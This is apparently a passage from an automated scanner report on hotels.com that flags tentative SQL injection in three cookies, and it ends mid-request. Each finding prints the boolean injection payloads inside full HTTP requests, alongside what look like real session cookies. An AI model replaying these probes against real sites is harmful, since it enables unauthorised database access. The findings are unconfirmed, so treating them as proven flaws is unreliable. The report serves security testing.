Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUUqMTA5MzY4fDA0LzEwLzIwMTF8MDcvMTAvMjAxMXwyIUYq; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:31:48 GMT; Path=/
Content-Length: 270898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" lang="en" >
<head>
<meta http-equiv="X-UA-Compatible" content="IE=9; IE=8; IE=7" />
<title>Boston Omni Parker House Hotel - Hotels.com - Hotel rooms with reviews. Discounts and Deals on 85,000 hotels worldwide</title>
<link href="/bundles/hcom-common-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-common.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-common.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 8]>
<link href="/bundles/hcom-common.ie8-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><link href="/bundles/hcom-hotel-details-rd-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-hotel-details.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-hotel-details.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

...[SNIP]...
1.18. http://www.hotels.com/hotel/details.html [channel cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /hotel/details.html

Issue detail

The channel cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the channel cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC'%20and%201%3d1--%20; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:33:11 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:30:46 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.0.0%3A130.1.1.i2%3A103.4.1.i6%3A171.0.0%3A98.6.4%3A142.1.0.i4%3A200.1.0%3A198.0.0%3A190.0.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.3.0.i1%3A132.0.0.i2%3A122.1.0.i3%3A149.0.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:30:46 GMT; Path=/
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:30:46 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjEuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6OTguNi40OjE0Mi4xLjAuaTQ6MjAwLjEuMDoxOTguMC4wOjE5MC4wLjA6MTM0LjAuMToyLjIuMToyMDkuMC4xOjE0Ny4wLjEuaTY6OTIuMy4wLmkxOjEzMi4wLjAuaTI6MTIyLjEuMC5pMzoxNDkuMC4wLmkxfEhDT01fVVMhQSplbl9VU3xIQ09NX1VTIUUqMTA5MzY4fDA0LzEwLzIwMTF8MDcvMTAvMjAxMXwyIUYq; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:30:46 GMT; Path=/
Content-Length: 270898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" lang="en" >
<head>
<meta http-equiv="X-UA-Compatible" content="IE=9; IE=8; IE=7" />
<title>Boston Omni Parker House Hotel - Hotels.com - Hotel rooms with reviews. Discounts and Deals on 85,000 hotels worldwide</title>
<link href="/bundles/hcom-common-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-common.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-common.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 8]>
<link href="/bundles/hcom-common.ie8-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text
...[SNIP]...

Request 2

GET /hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC'%20and%201%3d2--%20; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:30:47 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:30:46 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUUqMTA5MzY4fDA0LzEwLzIwMTF8MDcvMTAvMjAxMXwyIUYq; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:30:46 GMT; Path=/
Content-Length: 270898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" lang="en" >
<head>
<meta http-equiv="X-UA-Compatible" content="IE=9; IE=8; IE=7" />
<title>Boston Omni Parker House Hotel - Hotels.com - Hotel rooms with reviews. Discounts and Deals on 85,000 hotels worldwide</title>
<link href="/bundles/hcom-common-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-common.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-common.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 8]>
<link href="/bundles/hcom-common.ie8-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><link href="/bundles/hcom-hotel-details-rd-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-hotel-details.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-hotel-details.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

...[SNIP]...
1.19. http://www.hotels.com/hotel/details.html [guid cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /hotel/details.html

Issue detail

The guid cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the guid cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1'%20and%201%3d1--%20; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:31:07 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:30:38 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.0.0%3A130.1.1.i2%3A103.4.1.i6%3A171.0.0%3A98.6.4%3A142.1.0.i4%3A200.1.0%3A198.0.0%3A190.0.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.3.0.i1%3A132.0.0.i2%3A122.1.0.i3%3A149.0.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:30:38 GMT; Path=/
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:30:38 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjEuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6OTguNi40OjE0Mi4xLjAuaTQ6MjAwLjEuMDoxOTguMC4wOjE5MC4wLjA6MTM0LjAuMToyLjIuMToyMDkuMC4xOjE0Ny4wLjEuaTY6OTIuMy4wLmkxOjEzMi4wLjAuaTI6MTIyLjEuMC5pMzoxNDkuMC4wLmkxfEhDT01fVVMhQSplbl9VU3xIQ09NX1VTIUUqMTA5MzY4fDA0LzEwLzIwMTF8MDcvMTAvMjAxMXwyIUYq; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:30:38 GMT; Path=/
Content-Length: 270898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" lang="en" >
<head>
<meta http-equiv="X-UA-Compatible" content="IE=9; IE=8; IE=7" />
<title>Boston Omni Parker House Hotel - Hotels.com - Hotel rooms with reviews. Discounts and Deals on 85,000 hotels worldwide</title>
<link href="/bundles/hcom-common-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-common.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-common.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 8]>
<link href="/bundles/hcom-common.ie8-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text
...[SNIP]...

Request 2

GET /hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1'%20and%201%3d2--%20; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:30:38 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:30:38 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUUqMTA5MzY4fDA0LzEwLzIwMTF8MDcvMTAvMjAxMXwyIUYq; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:30:38 GMT; Path=/
Content-Length: 270898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" lang="en" >
<head>
<meta http-equiv="X-UA-Compatible" content="IE=9; IE=8; IE=7" />
<title>Boston Omni Parker House Hotel - Hotels.com - Hotel rooms with reviews. Discounts and Deals on 85,000 hotels worldwide</title>
<link href="/bundles/hcom-common-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-common.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-common.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 8]>
<link href="/bundles/hcom-common.ie8-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><link href="/bundles/hcom-hotel-details-rd-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen,print" />
<!--[if lte IE 6]>
<link href="/bundles/hcom-hotel-details.ie6-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

<![endif]--><!--[if IE 7]>
<link href="/bundles/hcom-hotel-details.ie7-H36.0.2-128976-HCOM_US-www_hotels_com-en_US.css" type="text/css" rel="stylesheet" media="screen" />

...[SNIP]...
1.20. http://www.hotels.com/hotel/hoteldata.html [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /hotel/hoteldata.html

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 21059860'%20or%201%3d1--%20 and 21059860'%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /hotel/hoteldata.html?destinationId=1401516&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&validate=false&previousDateful=false&nightlyPrice=289%2CUSD&dateful=true HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
